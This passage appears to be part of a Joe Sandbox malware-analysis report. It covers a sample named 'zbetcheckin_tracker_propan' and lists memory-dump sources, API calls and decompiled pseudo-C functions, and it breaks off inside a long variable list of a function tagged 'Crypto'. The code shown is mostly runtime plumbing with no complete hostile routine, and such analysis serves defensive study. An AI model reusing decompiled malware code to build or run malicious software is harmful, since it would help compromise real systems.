0x0040c870
0x0040c872
0x0040ca07
0x0040ca07
0x0040ca07
0x0040ca11

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 1df5aab26cce6a590467ba8984cd46d13c7e9d27c19c7d2ffe64352157d2ad9f
Instruction ID: 77a98e662e54e322b8ad65453a57a911915f1f33a9c59b42746a43509019c595
Opcode Fuzzy Hash: 1df5aab26cce6a590467ba8984cd46d13c7e9d27c19c7d2ffe64352157d2ad9f
Instruction Fuzzy Hash:

Function 0040240C, Relevance: 1.3, APIs: 1, Instructions: 46

C-Code - Quality: 88%

			E0040240C(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
				void* __ecx;
				void* __esi;
				void* _t20;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;

				_t24 = __edx;
				_t22 = 8;
				_t26 = E00401046(0x318);
				if(_t26 != 0) {
					memset(_t26, 0, 0x318);
					asm("cdq");
					 *((intOrPtr*)(_t26 + 8)) = _a8;
					 *((intOrPtr*)(_t26 + 0xc)) = _t24;
					asm("cdq");
					 *((intOrPtr*)(_t26 + 0x10)) = _a12;
					 *((intOrPtr*)(_t26 + 0x14)) = _t24;
					if((_a16 & 0x00000010) != 0) {
						L4:
						_t20 = E004022EC(_a4, _t23, _t24, _t26); // executed
					} else {
						_t31 =  *0x405480 & 0x00000001;
						if(( *0x405480 & 0x00000001) == 0) {
							goto L4;
						} else {
							_t20 = E0040219B(_t23, _t24, _t26, _t31, _a4);
						}
					}
					_t22 = _t20;
					E0040105B(_t26);
				}
				return _t22;
			}

0x0040240c
0x00402415
0x00402421
0x00402425
0x0040242b
0x00402433
0x00402434
0x0040243a
0x0040243d
0x00402445
0x00402448
0x0040244b
0x00402460
0x00402463
0x0040244d
0x0040244d
0x00402454
0x00000000
0x00402456
0x00402459
0x00402459
0x00402454
0x00402469
0x0040246b
0x0040246b
0x00402477

APIs

Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052

memset.NTDLL ref: 0040242B

Part of subcall function 004022EC: memset.NTDLL ref: 0040230E
Part of subcall function 004022EC: memcpy.NTDLL(00000218,00402E72,00000100,?,00010003,?,?,00000318,00000008), ref: 00402389
Part of subcall function 004022EC: RtlNtStatusToDosError.NTDLL ref: 004023DE
Part of subcall function 004022EC: GetLastError.KERNEL32(?,00000318,00000008), ref: 004023FC

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Part of subcall function 0040219B: memset.NTDLL ref: 004021C1
Part of subcall function 0040219B: memcpy.NTDLL ref: 004021E9
Part of subcall function 0040219B: GetLastError.KERNEL32(00000010,00000218,00402E4D,00000100,?,00000318,00000008), ref: 00402200
Part of subcall function 0040219B: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402E4D,00000100), ref: 004022DE

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Error$Lastmemset$Heapmemcpy$AllocFreeStatus
String ID:
API String ID: 1319484078-0
Opcode ID: 05c3c156d6a564b4d23f0c9494294d2605850215a57035f04da3c0b06525babc
Instruction ID: 0ebad9c16cd1f448e78e70fc10c038a5f21bde38a53b80f23977230a8da96151
Opcode Fuzzy Hash: 05c3c156d6a564b4d23f0c9494294d2605850215a57035f04da3c0b06525babc
Instruction Fuzzy Hash: 520126305013086BC3209F29DD49B5B3BE8AB41718F00803FFC44A72C1D3B9EA4487A9

Function 002D5273, Relevance: 1.3, APIs: 1, Instructions: 36sleep

APIs

Sleep.KERNELBASE(000001F4), ref: 002D52B8

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 240481b2703b06abb3b32220f7777ba63a11894a459c5872929ab18172d29a07
Instruction ID: 80327a43b451eb379482cd2688edaceaded5181abad989fad5a20482b8df6c8d
Opcode Fuzzy Hash: 240481b2703b06abb3b32220f7777ba63a11894a459c5872929ab18172d29a07
Instruction Fuzzy Hash: 11F08771D10229EFDB00DBA8C88CAEDB7B8EF05314F1481ABE912A3280C7B06E44DF51

Non-executed Functions

Function 00250000, Relevance: 25.3, Strings: 20, Instructions: 298

Strings

e, xrefs: 00250098
C\.x, xrefs: 002500BF
e, xrefs: 0025025D
., xrefs: 00250242
e, xrefs: 002500AA
e, xrefs: 0025024B
l.x, xrefs: 002502BB
apeee, xrefs: 00250482
., xrefs: 00250416
C\apeee, xrefs: 00250446
x, xrefs: 002500A1
x, xrefs: 00250254
x, xrefs: 00250428
e, xrefs: 00250431
e, xrefs: 0025041F
C\efee, xrefs: 00250272
sl.x, xrefs: 002502A1
., xrefs: 0025008F
\.x, xrefs: 002500D9
l.x, xrefs: 002504A9

Memory Dump Source

Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: .$.$.$C\.x$C\apeee$C\efee$\.x$apeee$e$e$e$e$e$e$l.x$l.x$sl.x$x$x$x
API String ID: 0-254566416
Opcode ID: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
Instruction ID: 5af075b26bbb76dd52ecc78308d545c852a0536055e6caa377d33dd12b444db4
Opcode Fuzzy Hash: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
Instruction Fuzzy Hash: F0E15F10A24216C9DB30AF00C8446FAB3F1FF21B19FD8D5C9C4985A651F7729DDACBA9

Function 00412282, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 152
libraryloader

C-Code - Quality: 64%

			E00412282(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t32;
				intOrPtr _t33;
				signed int _t37;
				signed int _t42;
				_Unknown_base(*)()* _t44;
				intOrPtr _t46;
				intOrPtr _t48;
				signed int _t54;
				void* _t63;
				void* _t68;
				void* _t71;
				struct HINSTANCE__* _t72;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr _t77;

				_t71 = __edx;
				_t26 = E0040F8B3();
				_t77 =  *0x4366cc; // 0x0
				_v20 = _t26;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(_t77 != 0) {
					L9:
					_t27 =  *0x4366d8; // 0x0
					_t73 = _v20;
					__eflags = _t27 - _t73;
					if(_t27 == _t73) {
						L19:
						_t28 =  *0x4366d0; // 0x0
						__eflags = _t28 - _t73;
						if(_t28 != _t73) {
							_t32 =  *((intOrPtr*)(E0040F8BC(_t28)))();
							__eflags = _t32;
							_v8 = _t32;
							if(_t32 != 0) {
								_t33 =  *0x4366d4; // 0x0
								__eflags = _t33 - _t73;
								if(_t33 != _t73) {
									_push(_v8);
									_v8 =  *((intOrPtr*)(E0040F8BC(_t33)))();
								}
							}
						}
						L23:
						_push(_a12);
						_push(_a8);
						_push(_a4);
						_push(_v8);
						return  *((intOrPtr*)(E0040F8BC( *0x4366cc)))();
					}
					__eflags =  *0x4366dc - _t73; // 0x0
					if(__eflags == 0) {
						goto L19;
					}
					_t37 =  *((intOrPtr*)(E0040F8BC(_t27)))();
					__eflags = _t37;
					if(_t37 == 0) {
						L14:
						__eflags = E0040CED0( &_v16);
						_pop(_t63);
						if(__eflags != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0040CA26(0, _t63, _t71, _t72, __eflags);
						}
						__eflags = _v16 - 4;
						if(_v16 < 4) {
							_a12 = _a12 | 0x00040000;
						} else {
							_a12 = _a12 | 0x00200000;
						}
						goto L23;
					}
					_push( &_v24);
					_push(0xc);
					_push( &_v36);
					_push(1);
					_push(_t37);
					_t42 =  *((intOrPtr*)(E0040F8BC( *0x4366dc)))();
					__eflags = _t42;
					if(_t42 == 0) {
						goto L14;
					}
					__eflags = _v28 & 0x00000001;
					if((_v28 & 0x00000001) != 0) {
						goto L19;
					}
					goto L14;
				}
				_t72 = LoadLibraryA("USER32.DLL");
				if(_t72 != 0) {
					_t44 = GetProcAddress(_t72, "MessageBoxA");
					__eflags = _t44;
					if(_t44 == 0) {
						goto L2;
					} else {
						_t46 = E0040F850(_t44);
						 *_t75 = "GetActiveWindow";
						 *0x4366cc = _t46;
						_t48 = E0040F850(GetProcAddress(??, ??));
						 *_t75 = "GetLastActivePopup";
						 *0x4366d0 = _t48;
						 *0x4366d4 = E0040F850(GetProcAddress(_t72, _t72));
						__eflags = E0040CE99( &_v12);
						_pop(_t68);
						if(__eflags != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0040CA26(0, _t68, _t71, _t72, __eflags);
							_t75 = _t75 + 0x14;
						}
						__eflags = _v12 - 2;
						if(_v12 == 2) {
							_t54 = E0040F850(GetProcAddress(_t72, "GetUserObjectInformationA"));
							__eflags = _t54;
							 *0x4366dc = _t54;
							if(_t54 != 0) {
								 *0x4366d8 = E0040F850(GetProcAddress(_t72, "GetProcessWindowStation"));
							}
						}
						goto L9;
					}
				}
				L2:
				return 0;
			}

0x00412282
0x0041228b
0x00412292
0x00412298
0x0041229b
0x0041229e
0x004122a1
0x004122a4
0x00412357
0x00412357
0x0041235c
0x0041235f
0x00412361
0x004123d0
0x004123d0
0x004123d5
0x004123d7
0x004123e0
0x004123e2
0x004123e4
0x004123e7
0x004123e9
0x004123ee
0x004123f0
0x004123f2
0x004123fe
0x004123fe
0x004123f0
0x004123e7
0x00412401
0x00412401
0x00412404
0x00412407
0x0041240a
0x00000000
0x00412419
0x00412363
0x00412369
0x00000000
0x00000000
0x00412372
0x00412374
0x00412376
0x0041239d
0x004123a6
0x004123a8
0x004123a9
0x004123ab
0x004123ac
0x004123ad
0x004123ae
0x004123af
0x004123b0
0x004123b5
0x004123b8
0x004123bc
0x004123c7
0x004123be
0x004123be
0x004123be
0x00000000
0x004123bc
0x0041237b
0x0041237c
0x00412381
0x00412382
0x00412384
0x00412391
0x00412393
0x00412395
0x00000000
0x00000000
0x00412397
0x0041239b
0x00000000
0x00000000
0x00000000
0x0041239b
0x004122b5
0x004122b9
0x004122ce
0x004122d0
0x004122d2
0x00000000
0x004122d4
0x004122d5
0x004122da
0x004122e2
0x004122ea
0x004122ef
0x004122f7
0x00412304
0x00412312
0x00412315
0x00412316
0x00412318
0x00412319
0x0041231a
0x0041231b
0x0041231c
0x0041231d
0x00412322
0x00412322
0x00412325
0x00412329
0x00412334
0x00412339
0x0041233c
0x00412341
0x00412352
0x00412352
0x00412341
0x00000000
0x00412329
0x004122d2
0x004122bb
0x00000000

APIs

LoadLibraryA.KERNEL32 ref: 004122AF
GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122CE

Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7

GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122E7
GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122FC
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA,?,?,?,00436218,0040EEF7,00436218), ref: 00412331
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,00436218,0040EEF7,00436218), ref: 00412349

Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06

Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913

Strings

GetUserObjectInformationA, xrefs: 0041232B
MessageBoxA, xrefs: 004122C8
USER32.DLL, xrefs: 004122AA
GetProcessWindowStation, xrefs: 00412343

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressProc$Value$ExceptionFilterHandleModulePointerProcessUnhandled$CurrentDebuggerDecodeEncodeLibraryLoadPresentTerminate
String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 2799798708-1046234306
Opcode ID: c3e8bde50756f9785b97914fa3b24a16ee4822c05a20e0c150603f0ff55fcea9
Instruction ID: 51af8bd7a9e657bb6f171ff335d3bd463ec0a5f6adc2d72fd75aa79d704417c7
Opcode Fuzzy Hash: c3e8bde50756f9785b97914fa3b24a16ee4822c05a20e0c150603f0ff55fcea9
Instruction Fuzzy Hash: B8419672900219BBCB10BFB5AD869EF7B68AB05744F10843FF914E2291DB7D85948B5C

Function 00404A60, Relevance: 11.5, Strings: 7, Instructions: 2730
Crypto

C-Code - Quality: 99%

			E00404A60() {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v25;
				signed char _v26;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v41;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char _v98;
				signed int _v104;
				intOrPtr _v108;
				signed int _v109;
				signed int _v116;
				short _v120;
				signed int _v124;
				short _v128;
				signed int _v132;
				signed int _v133;
				signed int _v140;
				signed int _v144;
				signed int _v145;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v165;
				signed int _v166;
				short _v172;
				signed int _v176;
				signed int _v180;
				signed int _v181;
				signed int _v188;
				signed int _v192;
				signed int _v193;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				char _v217;
				signed short _v224;
				signed int _v228;
				signed int _v236;
				signed int _v237;
				signed int _v244;
				intOrPtr _v252;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				intOrPtr _v272;
				signed char _v273;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr _v300;
				signed int _v301;
				intOrPtr _v308;
				intOrPtr _v312;
				signed int _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				long long _v332;
				long long _v340;
				long long _v348;
				long long _v356;
				long long _v364;
				long long _v372;
				long long _v380;
				long long _v388;
				long long _v396;
				long long _v404;
				long long _v412;
				long long _v420;
				long long _v428;
				long long _v436;
				long long _v444;
				long long _v452;
				long long _v460;
				long long _v468;
				long long _v476;
				long long _v484;
				long long _v492;
				long long _v500;
				long long _v508;
				long long _v516;
				long long _v524;
				long long _v532;
				long long _v540;
				long long _v548;
				long long _v556;
				long long _v564;
				long long _v572;
				long long _v580;
				long long _v588;
				long long _v596;
				long long _v604;
				long long _v612;
				long long _v620;
				long long _v628;
				long long _v636;
				long long _v644;
				long long _v652;
				long long _v660;
				long long _v668;
				long long _v676;
				long long _v684;
				long long _v692;
				long long _v700;
				long long _v708;
				long long _v716;
				long long _v724;
				long long _v732;
				long long _v740;
				long long _v748;
				long long _v756;
				long long _v764;
				long long _v772;
				long long _v780;
				long long _v788;
				long long _v796;
				long long _v804;
				long long _v812;
				long long _v820;
				long long _v828;
				long long _v836;
				long long _v844;
				long long _v852;
				long long _v860;
				long long _v868;
				long long _v876;
				long long _v884;
				long long _v892;
				long long _v900;
				long long _v908;
				long long _v916;
				long long _v924;
				long long _v932;
				long long _v940;
				long long _v948;
				long long _v956;
				long long _v964;
				long long _v972;
				long long _v980;
				long long _v988;
				long long _v996;
				long long _v1004;
				long long _v1012;
				long long _v1020;
				long long _v1028;
				long long _v1036;
				long long _v1044;
				long long _v1052;
				long long _v1060;
				long long _v1068;
				long long _v1076;
				long long _v1084;
				long long _v1092;
				long long _v1100;
				long long _v1108;
				long long _v1116;
				long long _v1124;
				long long _v1132;
				long long _v1140;
				long long _v1148;
				long long _v1156;
				long long _v1164;
				long long _v1172;
				long long _v1180;
				long long _v1188;
				long long _v1196;
				long long _v1204;
				long long _v1212;
				long long _v1220;
				long long _v1228;
				long long _v1236;
				long long _v1244;
				long long _v1252;
				long long _v1260;
				long long _v1268;
				long long _v1276;
				long long _v1284;
				long long _v1292;
				long long _v1300;
				long long _v1308;
				long long _v1316;
				long long _v1324;
				long long _v1332;
				long long _v1340;
				long long _v1348;
				long long _v1356;
				long long _v1364;
				long long _v1372;
				long long _v1380;
				long long _v1388;
				long long _v1396;
				long long _v1404;
				long long _v1412;
				long long _v1420;
				long long _v1428;
				long long _v1436;
				long long _v1444;
				long long _v1452;
				long long _v1460;
				long long _v1468;
				long long _v1476;
				long long _v1484;
				long long _v1492;
				long long _v1500;
				long long _v1508;
				long long _v1516;
				long long _v1524;
				long long _v1532;
				long long _v1540;
				long long _v1548;
				long long _v1556;
				long long _v1564;
				long long _v1572;
				long long _v1580;
				long long _v1588;
				long long _v1596;
				long long _v1604;
				long long _v1612;
				long long _v1620;
				long long _v1628;
				long long _v1636;
				long long _v1644;
				long long _v1652;
				long long _v1660;
				long long _v1668;
				long long _v1676;
				long long _v1684;
				long long _v1692;
				long long _v1700;
				long long _v1708;
				long long _v1716;
				long long _v1724;
				long long _v1732;
				long long _v1740;
				long long _v1748;
				long long _v1756;
				long long _v1764;
				long long _v1772;
				long long _v1780;
				long long _v1788;
				long long _v1796;
				long long _v1804;
				long long _v1812;
				long long _v1820;
				long long _v1828;
				long long _v1836;
				long long _v1844;
				long long _v1852;
				long long _v1860;
				long long _v1868;
				long long _v1876;
				long long _v1884;
				long long _v1892;
				long long _v1900;
				long long _v1908;
				long long _v1916;
				long long _v1924;
				long long _v1932;
				long long _v1940;
				long long _v1948;
				long long _v1956;
				long long _v1964;
				long long _v1972;
				long long _v1980;
				long long _v1988;
				long long _v1996;
				long long _v2004;
				long long _v2012;
				long long _v2020;
				long long _v2028;
				long long _v2036;
				long long _v2044;
				long long _v2052;
				long long _v2060;
				long long _v2068;
				long long _v2076;
				long long _v2084;
				long long _v2092;
				long long _v2100;
				long long _v2108;
				long long _v2116;
				long long _v2124;
				long long _v2132;
				long long _v2140;
				long long _v2148;
				long long _v2156;
				long long _v2164;
				long long _v2172;
				long long _v2180;
				long long _v2188;
				long long _v2196;
				long long _v2204;
				long long _v2212;
				long long _v2220;
				long long _v2228;
				long long _v2236;
				long long _v2244;
				long long _v2252;
				long long _v2260;
				long long _v2268;
				long long _v2276;
				long long _v2284;
				long long _v2292;
				long long _v2300;
				long long _v2308;
				long long _v2316;
				long long _v2324;
				long long _v2332;
				long long _v2340;
				long long _v2348;
				long long _v2356;
				long long _v2364;
				long long _v2372;
				long long _v2380;
				long long _v2388;
				long long _v2396;
				long long _v2404;
				long long _v2412;
				long long _v2420;
				long long _v2428;
				long long _v2436;
				long long _v2444;
				long long _v2452;
				long long _v2460;
				long long _v2468;
				long long _v2476;
				long long _v2484;
				long long _v2492;
				long long _v2500;
				long long _v2508;
				long long _v2516;
				long long _v2524;
				long long _v2532;
				long long _v2540;
				long long _v2548;
				long long _v2556;
				long long _v2564;
				long long _v2572;
				long long _v2580;
				long long _v2588;
				long long _v2596;
				long long _v2604;
				long long _v2612;
				long long _v2620;
				long long _v2628;
				long long _v2636;
				long long _v2644;
				long long _v2652;
				long long _v2660;
				long long _v2668;
				long long _v2676;
				long long _v2684;
				long long _v2692;
				long long _v2700;
				long long _v2708;
				long long _v2716;
				long long _v2724;
				long long _v2732;
				long long _v2740;
				long long _v2748;
				long long _v2756;
				long long _v2764;
				long long _v2772;
				long long _v2780;
				long long _v2788;
				long long _v2796;
				long long _v2804;
				long long _v2812;
				long long _v2820;
				long long _v2828;
				long long _v2836;
				long long _v2844;
				long long _v2852;
				long long _v2860;
				long long _v2868;
				long long _v2876;
				long long _v2884;
				long long _v2892;
				long long _v2900;
				long long _v2908;
				long long _v2916;
				long long _v2924;
				long long _v2932;
				long long _v2940;
				long long _v2948;
				long long _v2956;
				long long _v2964;
				long long _v2972;
				long long _v2980;
				long long _v2988;
				long long _v2996;
				long long _v3004;
				long long _v3012;
				long long _v3020;
				long long _v3028;
				long long _v3036;
				long long _v3044;
				long long _v3052;
				long long _v3060;
				long long _v3068;
				long long _v3076;
				long long _v3084;
				long long _v3092;
				long long _v3100;
				long long _v3108;
				long long _v3116;
				long long _v3124;
				long long _v3132;
				long long _v3140;
				long long _v3148;
				long long _v3156;
				long long _v3164;
				long long _v3172;
				long long _v3180;
				long long _v3188;
				long long _v3196;
				long long _v3204;
				long long _v3212;
				long long _v3220;
				long long _v3228;
				long long _v3236;
				long long _v3244;
				long long _v3252;
				long long _v3260;
				long long _v3268;
				long long _v3276;
				long long _v3284;
				long long _v3292;
				long long _v3300;
				long long _v3308;
				long long _v3316;
				long long _v3324;
				long long _v3332;
				long long _v3340;
				long long _v3348;
				long long _v3356;
				long long _v3364;
				long long _v3372;
				long long _v3380;
				long long _v3388;
				long long _v3396;
				long long _v3404;
				long long _v3412;
				long long _v3420;
				long long _v3428;
				long long _v3436;
				long long _v3444;
				long long _v3452;
				long long _v3460;
				long long _v3468;
				long long _v3476;
				long long _v3484;
				long long _v3492;
				long long _v3500;
				long long _v3508;
				long long _v3516;
				long long _v3524;
				long long _v3532;
				long long _v3540;
				long long _v3548;
				long long _v3556;
				long long _v3564;
				long long _v3572;
				long long _v3580;
				long long _v3588;
				long long _v3596;
				long long _v3604;
				long long _v3612;
				long long _v3620;
				long long _v3628;
				long long _v3636;
				long long _v3644;
				long long _v3652;
				long long _v3660;
				long long _v3668;
				long long _v3676;
				long long _v3684;
				long long _v3692;
				long long _v3700;
				long long _v3708;
				long long _v3716;
				long long _v3724;
				long long _v3732;
				long long _v3740;
				long long _v3748;
				long long _v3756;
				long long _v3764;
				long long _v3772;
				long long _v3780;
				long long _v3788;
				long long _v3796;
				long long _v3804;
				long long _v3812;
				long long _v3820;
				long long _v3828;
				long long _v3836;
				long long _v3844;
				long long _v3852;
				long long _v3860;
				long long _v3868;
				long long _v3876;
				long long _v3884;
				long long _v3892;
				long long _v3900;
				long long _v3908;
				long long _v3916;
				long long _v3924;
				long long _v3932;
				long long _v3940;
				long long _v3948;
				long long _v3956;
				long long _v3964;
				long long _v3972;
				long long _v3980;
				long long _v3988;
				long long _v3996;
				long long _v4004;
				long long _v4012;
				long long _v4020;
				long long _v4028;
				long long _v4036;
				long long _v4044;
				long long _v4052;
				long long _v4060;
				long long _v4068;
				long long _v4076;
				long long _v4084;
				long long _v4092;
				long long _v4100;
				long long _v4108;
				long long _v4116;
				long long _v4124;
				long long _v4132;
				long long _v4140;
				long long _v4148;
				long long _v4156;
				long long _v4164;
				long long _v4172;
				long long _v4180;
				long long _v4188;
				long long _v4196;
				long long _v4204;
				long long _v4212;
				long long _v4220;
				long long _v4228;
				long long _v4236;
				long long _v4244;
				long long _v4252;
				long long _v4260;
				long long _v4268;
				long long _v4276;
				long long _v4284;
				long long _v4292;
				long long _v4300;
				long long _v4308;
				long long _v4316;
				long long _v4324;
				long long _v4332;
				long long _v4340;
				long long _v4348;
				long long _v4356;
				long long _v4364;
				long long _v4372;
				long long _v4380;
				long long _v4388;
				long long _v4396;
				long long _v4404;
				long long _v4412;
				long long _v4420;
				long long _v4428;
				long long _v4436;
				long long _v4444;
				long long _v4452;
				long long _v4460;
				long long _v4468;
				long long _v4476;
				long long _v4484;
				long long _v4492;
				long long _v4500;
				long long _v4508;
				long long _v4516;
				long long _v4524;
				long long _v4532;
				long long _v4540;
				long long _v4548;
				long long _v4556;
				long long _v4564;
				long long _v4572;
				long long _v4580;
				long long _v4588;
				long long _v4596;
				long long _v4604;
				long long _v4612;
				long long _v4620;
				long long _v4628;
				long long _v4636;
				long long _v4644;
				long long _v4652;
				long long _v4660;
				long long _v4668;
				long long _v4676;
				long long _v4684;
				long long _v4692;
				long long _v4700;
				long long _v4708;
				long long _v4716;
				long long _v4724;
				long long _v4732;
				long long _v4740;
				long long _v4748;
				long long _v4756;
				long long _v4764;
				long long _v4772;
				long long _v4780;
				long long _v4788;
				long long _v4796;
				long long _v4804;
				long long _v4812;
				long long _v4820;
				long long _v4828;
				long long _v4836;
				long long _v4844;
				long long _v4852;
				long long _v4860;
				long long _v4868;
				long long _v4876;
				long long _v4884;
				long long _v4892;
				long long _v4900;
				long long _v4908;
				long long _v4916;
				long long _v4924;
				long long _v4932;
				long long _v4940;
				long long _v4948;
				long long _v4956;
				long long _v4964;
				long long _v4972;
				long long _v4980;
				long long _v4988;
				long long _v4996;
				long long _v5004;
				long long _v5012;
				long long _v5020;
				long long _v5028;
				long long _v5036;
				long long _v5044;
				long long _v5052;
				long long _v5060;
				long long _v5068;
				long long _v5076;
				long long _v5084;
				long long _v5092;
				long long _v5100;
				long long _v5108;
				long long _v5116;
				long long _v5124;
				long long _v5132;
				long long _v5140;
				long long _v5148;
				long long _v5156;
				long long _v5164;
				long long _v5172;
				long long _v5180;
				long long _v5188;
				long long _v5196;
				long long _v5204;
				long long _v5212;
				long long _v5220;
				long long _v5228;
				long long _v5236;
				long long _v5244;
				long long _v5252;
				long long _v5260;
				long long _v5268;
				long long _v5276;
				long long _v5284;
				long long _v5292;
				long long _v5300;
				long long _v5308;
				long long _v5316;
				long long _v5324;
				long long _v5332;
				long long _v5340;
				long long _v5348;
				long long _v5356;
				long long _v5364;
				long long _v5372;
				long long _v5380;
				long long _v5388;
				long long _v5396;
				long long _v5404;
				long long _v5412;
				long long _v5420;
				long long _v5428;
				long long _v5436;
				long long _v5444;
				long long _v5452;
				long long _v5460;
				long long _v5468;
				long long _v5476;
				long long _v5484;
				long long _v5492;
				long long _v5500;
				long long _v5508;
				long long _v5516;
				long long _v5524;
				long long _v5532;
				long long _v5540;
				long long _v5548;
				long long _v5556;
				long long _v5564;
				long long _v5572;
				long long _v5580;
				long long _v5588;
				long long _v5596;
				long long _v5604;
				long long _v5612;
				long long _v5620;
				long long _v5628;
				long long _v5636;
				long long _v5644;
				long long _v5652;
				long long _v5660;
				long long _v5668;
				long long _v5676;
				long long _v5684;
				long long _v5692;
				long long _v5700;
				long long _v5708;
				long long _v5716;
				long long _v5724;
				long long _v5732;
				long long _v5740;
				long long _v5748;
				long long _v5756;
				long long _v5764;
				long long _v5772;
				long long _v5780;
				long long _v5788;
				long long _v5796;
				long long _v5804;
				long long _v5812;
